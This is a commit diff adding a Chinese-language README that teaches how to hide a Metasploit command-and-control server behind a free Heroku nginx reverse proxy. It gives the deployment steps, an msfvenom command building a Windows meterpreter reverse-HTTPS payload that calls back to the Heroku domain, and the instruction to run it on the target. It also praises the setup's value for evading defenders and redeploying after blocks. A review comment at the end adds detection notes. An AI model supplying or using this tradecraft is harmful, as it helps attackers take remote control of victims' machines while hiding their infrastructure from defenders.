Commit 7b270e7

authored
Create README.md
1 parent f2da6c2 commit 7b270e7

File tree

1 file changed

+41
-0
lines changed

README.md

+41
@@ -0,0 +1,41 @@
1+
# 利用heroku隐藏C2服务器
2+
Heroku是一个支持多种编程语言的云平台即服务。简单理解就是可以免费部署docker容器并且可以开放web服务到互联网.下面介绍操作步骤.
3+
4+
- 首先注册Heroku账号,点击通过 [https://dashboard.heroku.com](https://dashboard.heroku.com/) 注册一个账号 (推荐使用gmail)
5+
- 注册成功以后登录,登录以后点击 [部署链接](https://dashboard.heroku.com/new?template=https://github.com/FunnyWolf/nginx-proxy-heroku),
6+
- app名称填写为 `mydiydomain` (可自定义,名称为后续域名前缀),TARGET环境变量填写为C2的handler地址
7+
8+
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603771065455-e03973a0-8763-4402-8b92-db358f8d0b1f.png#align=left&display=inline&height=488&margin=%5Bobject%20Object%5D&name=image.png&originHeight=976&originWidth=1224&size=76155&status=done&style=none&width=612)
9+
10+
- 然后点击 Deploy app 系统会自动部署.
11+
- 在metasploit-framework中添加handler,配置如图
12+
13+
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603771665090-ad5c1ecd-c257-44f3-9128-4430183a2e34.png#align=left&display=inline&height=191&margin=%5Bobject%20Object%5D&name=image.png&originHeight=381&originWidth=1334&size=59756&status=done&style=none&width=667)![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603771713694-163331e4-cb96-4bb9-aa79-84980ab9c4ee.png#align=left&display=inline&height=155&margin=%5Bobject%20Object%5D&name=image.png&originHeight=309&originWidth=2281&size=88820&status=done&style=none&width=1140.5)
14+
15+
16+
- 执行 `to_handler` 生成listener
17+
- 使用如下命令生成payload
18+
```bash
19+
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=mydiydomain.herokuapp.com LPORT=443 -f exe -o ~/payload.exe
20+
```
21+
22+
- 上传运行目标机器运行即可
23+
# 运行效果
24+
25+
- 在metasploit-framework中查看session如下,可以看到session的链接地址为heroku中转服务器地址
26+
27+
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772048769-0192b120-768f-45ef-986f-4c13d4c1fae4.png#align=left&display=inline&height=133&margin=%5Bobject%20Object%5D&name=image.png&originHeight=265&originWidth=1737&size=32159&status=done&style=none&width=868.5)
28+
29+
- 在目标机抓包效果如下
30+
31+
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772254394-2251f568-89ae-48de-9c55-36b864bbffb0.png#align=left&display=inline&height=33&margin=%5Bobject%20Object%5D&name=image.png&originHeight=66&originWidth=802&size=6382&status=done&style=none&width=401)
32+
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772434299-3721e8f1-0eae-4296-b735-a741b20830d8.png#align=left&display=inline&height=230&margin=%5Bobject%20Object%5D&name=image.png&originHeight=459&originWidth=1612&size=144248&status=done&style=none&width=806)
33+
![image.png](https://cdn.nlark.com/yuque/0/2020/png/159259/1603772464467-3e81edaf-c634-42de-8e79-8ef5091a7c03.png#align=left&display=inline&height=768&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1535&originWidth=1296&size=272442&status=done&style=none&width=648)
34+
# 总结
35+
heroku隐藏C2从技术原理上看非常简单,使用heroku服务部署nginx反向代理服务,payload连接heroku的nginx,nginx将流量转发到C2.具体优势如下:
36+
37+
- 只需要注册heroku免费账号即可
38+
- 无需注册或购买域名
39+
- 自带可信的SSL证书(heroku域名自带证书)
40+
- 如果IP地址被封锁,可删除原有heroku app重新部署heroku app(大约需要30s),与防守人员持续对抗
41+
- 操作步骤简单
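Review bot: The deployment step at line 6 sets TARGET to "the C2 handler address" without saying what form the value takes, while the summary at lines 35-36 describes the app as an nginx reverse proxy and the payload at line 19 is `meterpreter_reverse_https` on port 443; the README should state whether TARGET is a bare host:port or a full URL, whether the nginx side terminates TLS and re-encrypts towards the handler, and which port the handler listens on, because the handler configuration exists only in screenshots (lines 13 and 27) that cannot be read from the diff. The msfvenom command has the same gap: LHOST is `mydiydomain.herokuapp.com`, so the app name chosen on line 6 and the LHOST value must match, and the text should say so rather than leave it implicit. From the defensive side, the capture on lines 31-33 already shows the point worth spelling out: the only artefact on the monitored host is a persistent HTTPS session to a newly created *.herokuapp.com subdomain, which is exactly what outbound-proxy logging and new-domain alerting can surface even though the handler's IP is hidden, so the "redeploy in 30s" advantage on line 40 does not remove the detection surface, it only moves it.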
